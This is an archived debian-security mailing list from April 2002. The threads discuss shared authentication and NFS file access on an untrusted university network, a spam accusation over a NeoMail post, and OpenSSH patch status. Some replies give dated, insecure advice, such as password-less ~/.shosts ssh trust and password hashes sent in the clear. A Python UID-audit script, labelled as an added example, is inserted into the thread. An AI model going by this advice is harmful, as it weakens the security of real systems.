(2) don't use libpam-ldap:
You 
You don't have to use libpam-ldap.  You could just use
libnss-ldap and have the ldap server transfer the password
hashes to the workstations in the clear ... which is equivalent
to NIS.  You could also use libnss-ldap with SSL/TLS so that the
hashes are transferred more securely (equivalent to NIS+).

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Re: NFS, password transparency, and security

2002-04-07 Thread Rob VanFleet

On Sun, Apr 07, 2002 at 07:39:43PM -0700, Luca Filipozzi wrote:
> Two choices for authentication (passwd + shadow):
> (1) Kerberos
> Never used it. Can't advise you.

I've looked at Kerberos, but at least a cursory glance at leaves the
impressions that it is ridiculously complicated to set up and requires
multiple servers.  If someone has used it and can correct me, please do.

> (2) LDAP
> Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> the equivalent of NIS but securely.

Without using SSL or Kerberos, would LDAP still be sending passwords
across the net in plain text?

[...]
> Several choices for file sharing:
> (1) NFS + iptables + tcpwrappers

Doing that right now.

> (2) SFS (see sfs-server sfs-client packages and www.fs.net)
> Requires users to authenticate against the file server, also.
> Consider using libpam-sfs (I'm rewriting it as we speak.)
> (3) OpenAFS (see openafs-fileserver + openafs-client)
> Also requirres users to authenticate against the file server, but
> when used in a Kerberos environment, you only have to logon once due
> to Kerberos' ticket-granting system.

Both of these sound very promising.  I had heard of AFS before, but not
SFS.  I'll have to research them further.  I'll probably have even more
questions after that though. :)

> Hope this (probably incomplete) list helps,

Immensely.  Thanks for the information.

Rob


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Re: NFS, password transparency, and security

2002-04-07 Thread Alvin Oga


hi ya

why not do the following ???

make one machine be your primary NIS server...
- all passwds defined there...

all other machines uses the NIS server for passwd authentication
and turn on ssh logins ( ~/.shosts )  w/o checking passwd

use automounter for /n//directories
http://www.Linux-Consulting.com/AutoFS/autofs-HOWTO.html

add additional security as needed
- turn on tcp_wrappers
- use secure nfs/portmapper

- do NOT allow insecure operations in a secure environment
( no wireless stuff, no dchp stuff, no pop3, no telnet, no ftp )

and magically its just like sun-environment... sorta ...

c ya
alvin
http://www.Linux-Sec.net 

On Sun, 7 Apr 2002, Luca Filipozzi wrote:

> On Sun, Apr 07, 2002 at 09:02:56PM -0500, Rob VanFleet wrote:
> > I work for several University astronomers who basically want something
> > like what they're used to at other places: a pure sun shop, running
> > NIS and NFS.
> 
> Two choices for authentication (passwd + shadow):
> (1) Kerberos
> Never used it. Can't advise you.
> (2) LDAP
> Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> the equivalent of NIS but securely.
> 
> Several choices for authorisation (pam_access.so):
> (1) local /etc/secuirty/access.conf listing all users
> (2) local /etc/secuirty/access.conf listing a group or netgroup
> - use local group file
> - use LDAP-distributed group or netgroup map
> 
> Several choices for file sharing:
> (1) NFS + iptables + tcpwrappers
> (2) SFS (see sfs-server sfs-client packages and www.fs.net)
> Requires users to authenticate against the file server, also.
> Consider using libpam-sfs (I'm rewriting it as we speak.)
> (3) OpenAFS (see openafs-fileserver + openafs-client)
> Also requirres users to authenticate against the file server, but
> when used in a Kerberos environment, you only have to logon once due
> to Kerberos' ticket-granting system.
> 
> Hope this (probably incomplete) list helps,
> 
> Luca
> 
> -- 
> Luca Filipozzi, Debian Developer
> [dpkg] We are the apt. You will be packaged. Comply.
> gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Re: NFS, password transparency, and security

2002-04-07 Thread Alan Shutko

Rob VanFleet <[EMAIL PROTECTED]> writes:

> They basically want to log into any one machine within this group
> with the same password, and be able to access any disks they choose
> from any pariticular machine (within this group).

An AFS-based setup is used at many places to great effect, especially
on untrusted nets, but I don't know how bad setup is.  I suspect it's
evil.

-- 
Alan Shutko <[EMAIL PROTECTED]> - In a variety of flavors!
Ban the bomb.  Save the world for conventional warfare.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi

On Sun, Apr 07, 2002 at 09:02:56PM -0500, Rob VanFleet wrote:
> I work for several University astronomers who basically want something
> like what they're used to at other places: a pure sun shop, running
> NIS and NFS.

Two choices for authentication (passwd + shadow):
(1) Kerberos
Never used it. Can't advise you.
(2) LDAP
Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
the equivalent of NIS but securely.

Several choices for authorisation (pam_access.so):
(1) local /etc/secuirty/access.conf listing all users
(2) local /etc/secuirty/access.conf listing a group or netgroup
- use local group file
- use LDAP-distributed group or netgroup map

Several choices for file sharing:
(1) NFS + iptables + tcpwrappers
(2) SFS (see sfs-server sfs-client packages and www.fs.net)
Requires users to authenticate against the file server, also.
Consider using libpam-sfs (I'm rewriting it as we speak.)
(3) OpenAFS (see openafs-fileserver + openafs-client)
Also requirres users to authenticate against the file server, but
when used in a Kerberos environment, you only have to logon once due
to Kerberos' ticket-granting system.

Hope this (probably incomplete) list helps,

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D






NFS, password transparency, and security

2002-04-07 Thread Rob VanFleet

I have a situation where my superiors are leaning heavily on me to make
life more convenient for them by having total availability of data from
a group of machines.  They basically want to log into any one machine
within this group with the same password, and be able to access any
disks they choose from any particular machine (within this group).

What makes me nervous is that I have little to no control over
the network.  The particular setup at our university is that every
single ethernet drop has a unique and world accessible IP (most of this
is done with DHCP, so most change, but the machines that have purposes,
like the aforementioned group - don't).  These machines also share
subnets with machines I don't control, which makes using non-encrypted
authentication even more dangerous than usual - it is a switched
network, but that doesn't protect against much at all.  The best I can
do to keep these machines from being affected from the world is to have
iptables firewalls set up on each of them, basically denying everything
including pings from outside specified subnets.  This is a less than
desirable solution, not to mention the scalability issues inherent with
every single machine having its own set of firewall rules.

What I am curious to know is what is the best way possible to implement
what they want and to do so as securely as possible.  I work for several
University astronomers who basically want something like what they're
used to at other places: a pure sun shop, running NIS and NFS.  While
I'm aware that this can be done just as easily with Linux, I am going to
assume that many places who run NIS/NFS do so inside a strictly internal
network, not on several Machines that have external IPs to themselves on
subnets shared by student lab machines and other untrusted nodes.

What I have done so far is just have a few users' home directories
mounted over NFS on a central machine, making sure that they have the
same UIDs across the board.  I am rapidly realizing that this solution
does not scale well, plus it does not provide a full solution.

I apologize in advance for any rambling or over-generalizations.  Please
add any advice or corrections you may have.


Thanks,
Rob


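The "same UIDs across the board" requirement above is easy to get wrong by hand, and a mismatch is a security problem, not just an inconvenience: an NFS server acts on the numeric UID a client presents, so a UID that belongs to a different person on one workstation gives that person the other user's files. Here is an added example (not from this thread or any project mentioned in it) that audits passwd entries collected from several hosts for both kinds of mismatch; the host names and passwd lines are constructed.

```python
# Added example, not from the thread: audit passwd entries gathered from the
# NFS server and its clients for UID/username mismatches. An NFS export acts on
# the numeric UID the client presents, so "same UID across the board" is what
# makes ownership on a shared disk mean the same person on every host.
from collections import defaultdict

# Constructed sample passwd lines, as if copied from three hosts.
PASSWD_BY_HOST = {
    "fileserver": "alice:x:1001:1001:Alice:/home/alice:/bin/bash\n"
                  "bob:x:1002:1002:Bob:/home/bob:/bin/bash\n",
    "ws1": "alice:x:1001:1001:Alice:/home/alice:/bin/bash\n"
           "carol:x:1002:1002:Carol:/home/carol:/bin/bash\n",
    "ws2": "alice:x:1005:1005:Alice:/home/alice:/bin/bash\n"
           "bob:x:1002:1002:Bob:/home/bob:/bin/bash\n",
}


def parse_passwd(text):
    """Return {username: uid} for passwd-format text; skip blank/comment lines."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3 or not fields[2].isdigit():
            continue  # not a well-formed passwd entry
        users[fields[0]] = int(fields[2])
    return users


def find_uid_conflicts(passwd_by_host):
    """Return (key, {host: value}) lists for names with differing UIDs and UIDs with differing names."""
    uid_of_name = defaultdict(dict)  # name -> {host: uid}
    name_of_uid = defaultdict(dict)  # uid  -> {host: name}
    for host, text in passwd_by_host.items():
        for name, uid in parse_passwd(text).items():
            uid_of_name[name][host] = uid
            name_of_uid[uid][host] = name
    # A conflict is any key whose per-host values are not all identical.
    name_conflicts = [(n, h) for n, h in sorted(uid_of_name.items())
                      if len(set(h.values())) > 1]
    uid_conflicts = [(u, h) for u, h in sorted(name_of_uid.items())
                     if len(set(h.values())) > 1]
    return {"name": name_conflicts, "uid": uid_conflicts}
```

On the sample data, `find_uid_conflicts(PASSWD_BY_HOST)` flags alice (UID 1005 on ws2 but 1001 elsewhere) and UID 1002 (bob on two hosts, carol on ws1); the second case is the one that hands carol's NFS access to bob's files.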




Re: NEOMAIL - as big kev in OZ would say, IM EXCITED !

2002-04-07 Thread Marcel Welschbillig

Hi,

Just wanted to make it clear that the email I sent about Neomail was 
purely to let other people know about a program that I thought was worth 
mentioning, it had nothing to do with Ernie Miller and was not intended 
to be SPAM.

I'm sorry if I have caused you problems Ernie, this is the last thing I 
wanted to do.

In future I will keep my discoveries to myself!

Marcel

Ernie Miller wrote:

> Andrew,
> 
> The NeoMail project's only member is me.  I have nothing to do with this
> guy, and though I'm happy he's happy with NeoMail, this is clearly
> inappropriate behavior.  I'm copying this mail to the perpetrator address as
> listed in your forward, so he understands that I don't encourage this type
> of behavior, but I don't have any affiliation with him.  I'd have been
> plenty happy if NeoMail hadn't become as popular as it is, and would
> certainly not be advertising, as I can't really handle the NeoMail-related
> e-mail I receive now as it is.
> 
> When you say "further damage," you imply my reputation is already
> damaged in the open-source community as-is, which I don't believe it to
> be -- unless someone were to mistake these mails as being originated by or
> condoned by me, and you are referring to this incident.   Hence my response
> to the list, hopefully clearing my name since you've opted to submit the
> accusation to the list as well.
> 
> Wait a second... upon rereading this mail I did in fact notice a mail in
> my inbox this morning from someone in Australia ranting about how much he
> liked NeoMail and that he had wasted money on a commercial solution prior to
> finding it.  The mail is at home, but I'd wager this is the same guy.  In
> any case, I'm sorry that he got a bit overexcited, and I hope everyone
> understands I had nothing to do with it.
> 
> If you need anything further from me feel free to reply to this address.
> 
> Thanks!
> 
> Ernie Miller
> 
> 
> - Original Message -
> From: "Andrew Lau" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Cc: "Debian-Security List" <[EMAIL PROTECTED]>
> Sent: Friday, April 05, 2002 7:55 AM
> Subject: Re: NEOMAIL - as big kev in OZ would say, IM EXCITED !
> 
> Dear Ernie Miller,
>  I'm forwarding you this piece of spam that was recently sent
> to debian-security mailing list. It is also archived at
>  3.html>. Being
> unable to find a Marcel Welschbillig listed on your SourceForge
> project page, I have decided against forwarding this to SourceForge
> abuse staff in the present time seeing as I am unable to determine
> whether this spam was authorised or not by you or anyone acting on
> behalf of the NeoMail project. However, this piece of spam has been
> previously listed on the Razor  website
> as spam which would lead me to believe that this is not a one-off
> incident. Please take action to stop further spam if you do know this
> person or else this unsolicited advertising promoting your project will
> only further damage your reputation among the open-source community.
> 
> Yours sincerely,
> Andrew "Netsnipe" Lau
> 
> - Forwarded message from Marcel Welschbillig
> <[EMAIL PROTECTED]> -
> 

Re: OpenSSH 3.1

2002-04-07 Thread Noah L. Meyerhans
On Sun, Apr 07, 2002 at 02:53:16PM +0200, Mark Janssen wrote:
> 
> Debian usually patches the (security) bug, without going straight to the
> new upstream release, but only upgrading the package number

That's only the case with stable.  In unstable, there is no reason not
to go straight to the new upstream version.  It is the package
maintainer's decision how and when to do that, though.  I'm sure 3.1 will
be packaged before long.

noah

-- 
 ___
| Web: http://web.morgul.net/~frodo/
| PGP Public Key: http://web.morgul.net/~frodo/mail.html 




Re: OpenSSH 3.1

2002-04-07 Thread Junichi Uekawa
"Peter Lieven" <[EMAIL PROTECTED]> cum veritate scripsit:

> is the "OpenSSH_3.0.2p1" version available in the testing/unstable tree 
> already patched
> against the "March 7, 2002: Off-by-one error in the channel code" security 
> hole?


yes.


-- 
[EMAIL PROTECTED] : Junichi Uekawa   http://www.netfort.gr.jp/~dancer
GPG Fingerprint : 17D6 120E 4455 1832 9423  7447 3059 BF92 CD37 56F4





Re: OpenSSH 3.1

2002-04-07 Thread Mark Janssen
On Sun, 2002-04-07 at 14:34, Peter Lieven wrote:
> Is there any reason why there is no OpenSSH 3.1 package for debian available 
> yet?
> is the "OpenSSH_3.0.2p1" version available in the testing/unstable tree 
> already patched
> against the "March 7, 2002: Off-by-one error in the channel code" security 
> hole?

Yes, it was fixed in debian package Openssh_3.0.2p1-8 (maybe already in
7, but that had other problems)

Debian usually patches the (security) bug, without going straight to the
new upstream release, but only upgrading the package number

-- 
Mark Janssen Unix / Linux, Open-Source and Internet Consultant @
SyConOS IT
E-mail: mark(at)markjanssen.nl / maniac(at)maniac.nl GnuPG Key Id:
357D2178
Web: Maniac.nl Unix-God.[Net|Org] MarkJanssen.[com|net|org|nl]
SyConOS.[com|nl]





OpenSSH 3.1

2002-04-07 Thread Peter Lieven



Is there any reason why there is no OpenSSH 3.1 
package for debian available yet?
is the "OpenSSH_3.0.2p1" version available in the 
testing/unstable tree already patched
against the "March 7, 2002: Off-by-one error in the channel code" security 
hole?
 
thanks
Peter

